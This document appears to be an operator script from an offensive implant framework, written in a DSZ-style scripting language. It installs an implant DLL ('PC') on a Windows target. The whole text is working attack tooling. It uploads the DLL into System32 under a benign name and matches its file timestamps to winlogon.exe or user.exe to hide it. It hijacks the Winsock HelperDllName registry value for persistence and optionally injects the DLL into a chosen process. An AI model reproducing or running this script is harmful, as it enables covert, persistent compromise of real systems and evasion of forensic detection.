@include "_Paths.dsi"; @include "_Processes.dsi"; @include "_Versions.dsi"; @include "windows/_RegistryIncludes.dsi"; @echo off; @disablewow64 on; if ($argc != 3) { echo("* Invalid parmeters", ERROR); echo(); echo("Usage: $argv[0] "); return false; } string $localFile = $argv[1]; string $procName = $argv[2]; string $regKey = "SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Winsock"; string $regKeyValue = "HelperDllName"; string $arch; _GetArch($arch); echo("", WARNING); echo("NOTE: In order to use HelperDllName as your install point, the process for which", WARNING); echo(" PC is configured must load wshtcpip.dll", WARNING); # get the system path string $sysPath; if (!_GetSystemPath($sysPath)) { echo("* Failed to get system path", ERROR); return false; } # get the HelperDllName value string $origKeyValue; if (!_GetRegistryValue("L", $regKey, $regKeyValue, $origKeyValue) || !defined($origKeyValue)) { $origKeyValue = ""; } if ($origKeyValue != "\%\%SystemRoot\%\%\\System32\\wshtcpip.dll") { echo("* Non-standard WSH value found ($origKeyValue)", WARNING); if (!prompt("Do you want to continue?", false)) { return false; } } # get the process id for injection int $id; if (prompt("Do you want to perform injection (for instant-grat)?")) { if (StrLen($procName) > 0) { if (!_FindProcessOnList($procName, $id) || !defined($id)) { echo("* Failed to find $procName", ERROR); } } # make sure the user wants to keep going if we don't have a process if (!defined($id)) { echo("No process for injection", ERROR); if (!prompt("Continue?")) { return false; } } } # get install name string $installName = "wship.dll"; if (!GetInput("PC DLL install name", $installName, $installName)) { echo("* Failed to get install name", ERROR); return false; } string $installPath = "\%\%SystemRoot\%\%\\System32"; if (!GetInput("PC DLL install path", $installPath, $installPath)) { echo("* Failed to get install path", ERROR); return false; } string $usePath; if ($installPath == "\%\%SystemRoot\%\%\\System32") { $usePath = $sysPath; } else { # user provided non-standard path $usePath = $installPath; } # upload the file echo "Uploading PC"; if (!`put "$localFile" -name "$usePath\\$installName" -permanent`) { echo(" FAILED", ERROR); pause; return false; } echo(" FINISHED", GOOD); # matchtimes on the file string $matchName = "user.exe"; if ($arch == "x64") { $matchName = "winlogon.exe"; } echo "Matching filetimes with $matchName"; if (!`matchfiletimes -src "$sysPath\\$matchName" -dst "$usePath\\$installName"`) { echo(" FAILED", ERROR); pause; # continue... } else { echo(" FINISHED", GOOD); } # update the registry key echo "Updating registry"; if (!_SetRegistryValue("L", $regKey, $regKeyValue, "$installPath\\$installName", "REG_EXPAND_SZ")) { echo(" FAILED", ERROR); echo "Deleting PC"; if (!`delete -file "$usePath\\$installName"`) { echo(" FAILED", ERROR); } else { echo(" DELETED", GOOD); } pause; return false; } echo(" SET", GOOD); if (defined($id)) { # inject the DLL echo "Injecting DLL"; if (!`injectdll -library "$usePath\\$installName" -id $id`) { echo(" FAILED", ERROR); } else { echo(" INJECTED", GOOD); } } echo "Install Finished"; echo "$regKeyValue before : '$origKeyValue'"; echo " $regKeyValue after : '$installPath\\$installName'"; pause; return true;